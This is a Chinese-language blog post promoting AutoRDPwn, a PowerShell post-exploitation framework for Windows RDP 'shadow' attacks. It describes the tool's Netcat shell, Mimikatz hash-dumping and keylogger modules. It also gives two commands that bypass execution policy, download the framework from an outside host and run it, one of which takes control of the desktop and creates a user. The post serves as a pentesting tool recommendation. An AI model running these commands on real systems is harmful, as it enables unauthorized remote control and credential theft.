推荐开源项目:AutoRDPwn - 自动化Windows后渗透框架
AutoRDPwn The Shadow Attack Framework 项目地址: https://gitcode.com/gh_mirrors/au/AutoRDPwn
AutoRDPwn 是一个以PowerShell编写的后渗透测试框架,专为执行Microsoft Windows系统上的"影子"攻击而设计。这个利用微软自身特性进行的漏洞攻击,使得远程攻击者可以在未经许可的情况下查看甚至控制受害者的桌面,全部使用操作系统内建工具实现。
项目技术分析
AutoRDPwn集成了多个附加模块,不仅可以通过Netcat获取远程shell,还可以利用Mimikatz导出系统哈希,加载远程键盘记录器等。最新版本中,它引入了对SharpRDP和Invoke-PrivescCheck的支持,进一步增强了其功能性和隐蔽性。
此外,该项目支持通过系统设置的代理进行连接,并提供了离线使用的.zip文件下载选项。菜单系统采用七种语言,确保全球用户的友好体验。一旦启动,你可以选择不同模块执行不同的攻击策略,无论是在本地还是远程环境。
项目及技术应用场景
AutoRDPwn适用于安全研究人员在授权环境中进行渗透测试,以及网络安全专业人员进行漏洞评估和教育训练。通过模拟真实世界中的攻击手段,它可以帮助你了解网络防御的脆弱之处,并提供改进措施。
例如,在企业内部网渗透场景下,可以通过AutoRDPwn快速评估RDP服务的安全性,演示如何通过权限提升攻击横向移动,并及时发现和修复潜在风险。
项目特点
- 自动化流程:简化了复杂的后渗透操作,让攻击流程更加高效。
- 多语言支持:支持英语、西班牙语、法语、德语、意大利语、俄语和葡萄牙语。
- 灵活性:可以本地执行,也可以远程通过反向shell运行。
- 模块丰富:包括Netcat远程shell、Mimikatz哈希导出、远程键盘记录器等实用模块。
- 代理兼容:能够根据系统设置使用代理连接。
- 更新频繁:持续优化与更新,修复问题并添加新功能。
获取与使用
AutoRDPwn在GitHub上开源,你可以直接在终端使用以下命令行启动:
对于本地执行:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
对于远程执行(假设已存在反向shell):
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
详细使用指南可访问开发者提供的链接:https://darkbyte.net/autordpwn-la-guia-definitiva
请注意:这款工具仅供合法的安全研究和教学使用,不应用于非法活动。作者不对任何滥用行为产生的后果负责。
关于作者和支持
AutoRDPwn由Joel Gámez Molina创建并维护。他的其他作品和更多信息可在Twitter (@JoelGMSec) 和博客 (darkbyte.net) 找到。如果你喜欢这个项目,可以通过Buymeacoffee平台给予支持。
让我们一起探索网络安全的世界,用AutoRDPwn提升你的测试技能!
AutoRDPwn The Shadow Attack Framework 项目地址: https://gitcode.com/gh_mirrors/au/AutoRDPwn
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考